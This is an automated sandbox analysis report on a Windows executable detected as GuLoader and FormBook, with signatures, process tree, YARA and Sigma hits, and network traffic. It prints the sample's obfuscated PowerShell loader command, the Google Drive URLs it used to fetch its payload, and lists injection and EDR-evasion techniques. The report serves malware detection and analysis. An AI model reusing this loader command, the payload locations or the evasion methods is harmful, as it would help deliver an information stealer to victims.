Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
textless.exe

Overview

General Information

Sample name:textless.exe
Analysis ID:1633447
MD5:9e8270179f04d867463a09af7ee36e32
SHA1:e32b5ff6d109b529112f35c8f639fbb1bb5f4986
SHA256:cc357e0c0d1b4b0c9cdaaa2f7fd530c7fcee6c62136462c1533d50971f97d976
Tags:exeHUNuser-smica83
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • textless.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\textless.exe" MD5: 9E8270179F04D867463A09AF7EE36E32)
    • powershell.exe (PID: 6504 cmdline: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Versificator.exe (PID: 3016 cmdline: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe" MD5: 9E8270179F04D867463A09AF7EE36E32)
        • 0ogHncCUa.exe (PID: 5556 cmdline: "C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\ZLQzzyNy0.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • logman.exe (PID: 2564 cmdline: "C:\Windows\SysWOW64\logman.exe" MD5: AE108F4DAAB2DD68470AC41F91A7A4E9)
            • 0ogHncCUa.exe (PID: 5068 cmdline: "C:\Program Files (x86)\HQamVIjYYSeOYIOAfTkpVOTzYllKzJxTLAkOmdZRbBPazEjlIMDBzOMxINnRvbIjBpAHUFLJeQW\o7geodUa.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
  • svchost.exe (PID: 5796 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Use Short Name Path in Command Line
            Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe", CommandLine: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Versificator.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Versificator.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Versificator.exe, ParentCommandLine: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6504, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Versificator.exe", ProcessId: 3016, ProcessName: Versificator.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", CommandLine: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\textless.exe", ParentImage: C:\Users\user\Desktop\textless.exe, ParentProcessId: 6400, ParentProcessName: textless.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Initialforkortelse28=gc -Raw 'C:\Users\user\AppData\Roaming\fyldepenneblkkets\fremtoning\Skoledrenge227\cacodemoniac.Pro';$forminate=$Initialforkortelse28.SubString(54637,3);.$forminate($Initialforkortelse28)", ProcessId: 6504, ProcessName: powershell.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5796, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-10T11:24:30.451932+010028032702Potentially Bad Traffic192.168.2.749692216.58.212.142443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\Versificator.exeReversingLabs: Detection: 23%
            Multi AV Scanner detection for submitted file
            Source: textless.exeVirustotal: Detection: 30%Perma Link
            Source: textless.exeReversingLabs: Detection: 23%
            Yara detected FormBook
            Source: Yara matchFile source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: textless.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.7:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49693 version: TLS 1.2
            Source: textless.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: logman.pdb source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Versificator.exe, Versificator.exe, 0000000B.00000002.2025498211.0000000021200000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916145484.0000000020EA3000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2025498211.000000002139E000.00000040.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1918089730.000000002105A000.00000004.00000020.00020000.00000000.sdmp, logman.exe, logman.exe, 0000000F.00000002.2119102794.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, logman.exe, 0000000F.00000003.2007154868.0000000002D1B000.00000004.00000020.00020000.00000000.sdmp, logman.exe, 0000000F.00000002.2119102794.000000000323E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: logman.pdbGCTL source: Versificator.exe, 0000000B.00000003.1975766609.000000000573A000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1975688557.0000000005723000.00000004.00000020.00020000.00000000.sdmp, 0ogHncCUa.exe, 0000000E.00000002.2118561913.0000000000E9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0ogHncCUa.exe, 0000000E.00000002.2117421157.000000000030F000.00000002.00000001.01000000.0000000F.sdmp
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00406167 FindFirstFileA,FindClose,0_2_00406167
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405705
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_00402688 FindFirstFileA,0_2_00402688
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\textless.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\SysWOW64\logman.exeCode function: 4x nop then xor eax, eax15_2_02749E40
            Source: C:\Windows\SysWOW64\logman.exeCode function: 4x nop then pop edi15_2_0274E6CC
            Source: C:\Windows\SysWOW64\logman.exeCode function: 4x nop then pop edi15_2_0274E70A
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49692 -> 216.58.212.142:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: powershell.exe, 00000001.00000002.1494796227.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: svchost.exe, 00000004.00000002.2121276429.0000025525000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
            Source: svchost.exe, 00000004.00000003.1203307470.0000025524E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: textless.exe, textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: textless.exe, 00000000.00000000.876802656.0000000000409000.00000008.00000001.01000000.00000003.sdmp, textless.exe, 00000000.00000002.925012774.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Versificator.exe, 0000000B.00000000.1493934268.0000000000409000.00000008.00000001.01000000.0000000B.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: svchost.exe, 00000004.00000002.2119751877.000002551FAA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: Versificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Versificator.exe, 0000000B.00000001.1494393684.00000000005F2000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/H
            Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2024837477.0000000020620000.00000004.00001000.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011648145.00000000056B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL
            Source: Versificator.exe, 0000000B.00000002.2011648145.0000000005678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OLX(
            Source: Versificator.exe, 0000000B.00000002.2011875250.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: Versificator.exe, 0000000B.00000003.1916473747.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011875250.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916473747.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011787884.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1638900319.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916585847.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916370325.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916621951.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916621951.00000000056C1000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916519243.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916441992.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000002.2011787884.00000000056C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download
            Source: Versificator.exe, 0000000B.00000002.2011875250.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1638900319.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916585847.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916370325.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916519243.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916441992.00000000056E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=download1A
            Source: Versificator.exe, 0000000B.00000002.2011875250.00000000056E6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1638900319.00000000056E5000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916585847.00000000056E2000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916370325.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916519243.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1916441992.00000000056E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=16GMLG6MwrWo7pB_xQG3qahd7oWSPK6OL&export=downloadle
            Source: svchost.exe, 00000004.00000003.1203307470.0000025524E59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
            Source: svchost.exe, 00000004.00000003.1203307470.0000025524E00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
            Source: powershell.exe, 00000001.00000002.1495736567.0000000004DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Versificator.exe, 0000000B.00000001.1494393684.0000000000649000.00000020.00000001.01000000.0000000C.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: powershell.exe, 00000001.00000002.1498538391.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: Versificator.exe, 0000000B.00000003.1583337427.00000000056D6000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583337427.00000000056F9000.00000004.00000020.00020000.00000000.sdmp, Versificator.exe, 0000000B.00000003.1583463613.00000000056F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownHTTPS traffic detected: 216.58.212.142:443 -> 192.168.2.7:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.7:49693 version: TLS 1.2
            Source: C:\Users\user\Desktop\textless.exeCode function: 0_2_004051BA GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004051BA

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 0000000B.00000002.2025465440.0000000020EF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2119246154.0000000004870000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.2119008918.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.2025840241.0000000023350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2117424471.0000000002740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118889121.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2118775273.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Versificator.exeJump to dropped file
